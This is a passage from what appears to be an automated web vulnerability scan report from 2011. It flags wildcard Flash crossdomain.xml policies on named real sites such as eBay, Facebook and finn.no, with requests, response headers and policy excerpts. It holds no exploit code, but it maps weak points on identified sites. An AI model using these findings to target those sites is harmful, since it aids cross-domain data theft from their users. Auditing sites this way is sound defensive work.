<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.241. http://www.democratsenators.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.democratsenators.org

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F06FC72A02718DD609B4D5068126AC61-n2; Path=/
ETag: W/"515-1303931257000"
Last-Modified: Wed, 27 Apr 2011 19:07:37 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 515
Date: Wed, 04 May 2011 02:15:27 GMT
Connection: close
Set-Cookie: Coyote-2-aae531e=aae52ca:0; path=/

<?xml version="1.0"?>
<!-- crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.democracyinaction.org" />
<allow-access-from domain="*.wiredforchange.com" />
<allow-access-from domain="*.salsalabs.com" />
<allow-access-from domain="*.dscc.org" />
<allow-access-from domain="*.truemajority.org" />
<allow-access-from domain="*.dlccweb.com" />
<allow-access-from domain="*.foe.org" />
<allow-access-from domain="*.agit-pop.com" />
<allow-access-from domain="*.peer2.com" />
...[SNIP]...

7.242. http://www.dorlingkindersley-uk.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dorlingkindersley-uk.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dorlingkindersley-uk.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:41 GMT
Server: Apache/1.3.27 (Unix) PHP/4.4.6
Set-Cookie: Apache=173.193.214.243.140041304481521412; path=/; expires=Tue, 02-Aug-11 03:58:41 GMT
Last-Modified: Tue, 08 Apr 2008 14:23:10 GMT
ETag: "1f6ab-115-47fb7fce"
Accept-Ranges: bytes
Content-Length: 277
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.clearspring.com"/>
   <allow-access-from domain="ninja.planetnewmedia.co.uk"/>
...[SNIP]...

7.243. http://www.drshnaps.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.drshnaps.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.drshnaps.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:28 GMT
Server: Apache
Last-Modified: Tue, 13 Jan 2009 17:26:25 GMT
ETag: "48e9784-95-4606085d07240"
Accept-Ranges: bytes
Content-Length: 149
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.drshnaps.com"/>
<allow-access-from domain="drshnaps.com"/>
</cross-domain-policy>

7.244. http://www.ebay.be/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ebay.be
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebay.be

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Wed, 04 May 2011 03:19:03 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

7.245. http://www.elabs3.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.elabs3.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elabs3.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:12 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 20:13:46 GMT
ETag: "3242-7ebfd280"
Accept-Ranges: bytes
Content-Length: 12866
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-poli
...[SNIP]...
<allow-access-from domain="*.aboutlyrishq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidhero.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidhero.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidhero.info" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidhero.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidhero.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidheroe.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bidheroes.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bobsfruitsite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.biz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clicktracks.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs1.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs2.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs4.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs5.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs6.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs7.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs8.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs10.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs11.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs12.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs13.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.elabs14.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nl.internet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.emailengine.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.emailfirewall.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.emaillabs.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.emaillabs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.emaillabs.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hqcampaign.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.jlhalsey.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.jlhalsey.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.keywordagent.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.asia" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.cc" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.co.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.jp" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyris.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.co.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.info" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrishq.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrisinc.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrisinc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrisinc.info" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrisinc.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrisinc.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyrislm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyristech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyristech.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyristechnologies.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lyristechnologies.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mailshield.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mailshield.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.makingmailwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.marketinghq.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.performancemail.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.performancemail.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piperdev.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piperqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pipersoftware.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ppcbidhero.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.salescenter.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.shelby.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.spark-list.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sparklist.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sparklist.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sparklist.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.test5flicks.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.top5flicks.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.up0.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.uptilt.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.uptilt.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.webanalyticsday.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cygnusinteractive.com" secure="false"/>
...[SNIP]...

7.246. http://www.electroluxappliances.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.electroluxappliances.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.electroluxappliances.com

Response

HTTP/1.0 200 OK
Content-Length: 1258
Content-Type: text/xml
Content-Location: http://www.electroluxappliances.com/crossdomain.xml
Last-Modified: Thu, 05 Feb 2009 14:09:05 GMT
Accept-Ranges: bytes
ETag: "e81fbc4d9b87c91:26f77"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:53 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-do
...[SNIP]...
<allow-access-from domain="scseluxusaview.electrolux.se"/>
   <allow-access-from domain="*.electroluxappliances.com"/>
   <allow-access-from domain="www.kelly-confidential.com"/>
   <allow-access-from domain="dev.kelly-confidential.com"/>
   <allow-access-from domain="*.buddymedia.com"/>
   <allow-access-from domain="*.facebook.com"/>
   <allow-access-from domain="*.atomicmouse.com"/>
...[SNIP]...

7.247. http://www.elnorte.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.elnorte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.elnorte.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 664
Content-Type: text/xml
Last-Modified: Thu, 25 Jun 2009 17:21:11 GMT
Accept-Ranges: bytes
ETag: "e9c21d56b9f5c91:66654"
p3p: CP="NOI CURa ADMa DEVa OUR IND UNI NAV INT"
X-Powered-By: ASP.NET
Server: 8021
Date: Wed, 04 May 2011 03:17:57 GMT
Connection: close
X-Robots-Tag: noarchive
X-UA-Compatible: IE=EmulateIE7

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gruporeforma.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gruporeforma.mural.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gruporeforma.reforma.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gruporeforma.elnorte.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.elnorte.com" />
<allow-access-from domain="www.reforma.com" />
<allow-access-from domain="www.mural.com" />
<allow-access-from domain="www.palabra.com" />
...[SNIP]...

7.248. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.147.57
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.249. http://www.fellowes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fellowes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fellowes.com

Response

HTTP/1.1 200 OK
Content-Length: 686
Content-Type: text/xml
Last-Modified: Wed, 09 Dec 2009 21:09:39 GMT
Accept-Ranges: bytes
ETag: "282a6feb1379ca1:d67"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.d10interactive.com"/>
...[SNIP]...
<allow-access-from domain="www.plaidpony.com"/>
...[SNIP]...
<allow-access-from domain="*.fellowes.com"/>
...[SNIP]...
<allow-access-from domain="webdev01"/>
...[SNIP]...

7.250. http://www.finn.no/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.finn.no
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.finn.no

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:34 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 23 Apr 2010 12:12:20 GMT
ETag: "2012b-33f-484e656c5f100"
Accept-Ranges: bytes
Content-Length: 831
P3P: CP="CURa CONi TELi OUR IND NID DSP CAO COR", policyref="http://www.finn.no/daily/w3c/p3p.xml"
Connection: close
Content-Type: application/xml
Set-Cookie: finnlb-?Finn-web?finnweb=JECFFLFA; Expires=Fri, 03-Jun-2011 11:54:34 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vg.no" />
<allow-access-from domain="*.emediate.se"/>
<allow-access-from domain="*.fvn.no"/>
<allow-access-from domain="*.aftenbladet.no"/>
<allow-access-from domain="*.aftenposten.no"/>
<allow-access-from domain="*.finn.no"/>
<allow-access-from domain="*.bt.no"/>
<allow-access-from domain="*.e24.no"/>
<allow-access-from domain="*.meglergaarden.no"/>
<allow-access-from domain="heliosiq.adtech.de"/>
<allow-access-from domain="adtech.panthercustomer.com"/>
<allow-access-from domain="aka-cdn-ns.adtech.de"/>
<allow-access-from domain="aka-cdn.adtech.de"/>
<allow-access-from domain="annonse.kroma.no"/>
...[SNIP]...

7.251. http://www.flwoutdoors.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.flwoutdoors.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flwoutdoors.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:37 GMT
Content-Length: 549
Content-Type: text/xml
ETag: "026d1baa964ca1:0"
Last-Modified: Fri, 13 Nov 2009 21:39:08 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.jacobsinteractive.com" />
<allow-access-from domain="*.kingfishconnection.com" />
<allow-access-from domain="*.flwoutdoors.com" />
<allow-access-from domain="*.collegefishing.com" />
<allow-access-from domain="*.fantasyfishing.com" />
<allow-access-from domain="*.windsorcraft.com" />
<allow-access-from domain="qa.tbfwebservices.com" />
...[SNIP]...

7.252. http://www.foofighters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foofighters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foofighters.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 18:37:37 GMT
ETag: "45f2b4-2d0-49f52e3555e40"
Accept-Ranges: bytes
Content-Length: 720
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sonymusic.com" />
<allow-access-from domain="sonymusic.com" />
<allow-access-from domain="*.columbiarecords.com" />
<allow-access-from domain="columbiarecords.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.google-analytics.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="windows.dev.boffswana.com.au" />
<allow-access-from domain="*.britneyvideogame.com" />
<allow-access-from domain="femmefatale.britney.com" />
...[SNIP]...

7.253. http://www.franktownrocks.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.franktownrocks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.franktownrocks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:31 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Thu, 16 Dec 2010 23:44:46 GMT
ETag: "9167c8-11c-4978fa37f7780"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-
...[SNIP]...
<allow-access-from domain="*.franktownrocks.com" />
...[SNIP]...

7.254. http://www.gadsdentimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gadsdentimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gadsdentimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 18:51:12 GMT
Accept-Ranges: bytes
ETag: "cea8dac23e75cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:27:39 GMT
Content-Length: 1027
X-Cache: MISS from nysquid01
X-Cache-Lookup: MISS from nysquid01:80
Via: 1.0 nysquid01 (squid/3.0.STABLE18)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.starnewsonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesville.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gainesvillesun.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sunone.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ocala.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starbanner.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.publicus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.us.publicus.com" secure="false" />
...[SNIP]...
